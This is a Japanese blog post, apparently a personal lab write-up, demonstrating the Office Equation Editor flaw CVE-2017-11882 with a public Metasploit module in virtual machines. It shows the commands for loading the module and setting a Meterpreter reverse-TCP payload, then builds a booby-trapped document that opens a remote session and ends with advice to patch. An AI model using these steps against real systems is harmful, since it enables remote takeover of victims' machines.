うさブロ

ぼっちなうさぎのセキュリティラボ

とある親父の侵入実験【CVE-2017-11882の活用】

f:id:appleseedj073:20170503114540p:plain

11月のアップデートで修正された「CVE-2017-11882」の脆弱性を利用したMetasploit用のexploitコードが公開されていたので検証してみた。本脆弱性は、ざっくり言うとMicrosoft Office脆弱性で17年前からの物らしい。詳しくは以下を参照w

JVNVU#90967793: Microsoft Office 数式エディタにスタックベースのバッファオーバーフローの脆弱性

 

環境(仮想環境)

 Kali Linux (172.16.100.147)

 Windows10 (172.16.100.138)

 

準備

exploitコードの入手。コードに関しては以下のサイトよりダウンロード。

securityonline.info

大体の手順もここに書いてあるw

ダウンロードしたRubyファイルを

 /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

に配置する

f:id:appleseedj073:20171125003628p:plain

Metasploitの起動して先ほど配置したexploitを指定する

 msf > use exploit/windows/fileformat/office_ms17_11882

f:id:appleseedj073:20171125003830p:plain

引き続きpayloadの指定

 msf exploit(office_ms17_11882) > set payload windows/meterpreter/reverse_tcp

f:id:appleseedj073:20171125004053p:plain

必要なoptionを入力する。今回はexploitするとファイルを生成するので出力先もしっかりと指定する。

f:id:appleseedj073:20171125004411p:plain

「FILENAME」と「LHOST」を入力する

f:id:appleseedj073:20171125010935p:plain

最後にexploitするとファイルが作成される。

f:id:appleseedj073:20171125004743p:plain

すると8080ポート(exploit)と4444ポート(payload)で待受るサーバが起動してファイルが作成される。

f:id:appleseedj073:20171125010207p:plain

これで準備完了!

 

検証

先ほど作成したファイルをWindows

f:id:appleseedj073:20171125010242p:plain

そして実行・・・

f:id:appleseedj073:20171125010438p:plain

マルウェアが見つかりましたと出るが・・・

f:id:appleseedj073:20171125010530p:plain

しっかりとセッションを確立してくれる!

f:id:appleseedj073:20171125010807p:plain

 

まとめ

この脆弱性Windows 7Windows 10にイストールされている全てのサポート対象のOfficeが、影響を受ける。

影響の範囲が、かなり広いので速やかに定例のアップデートを実施すべきだと思います。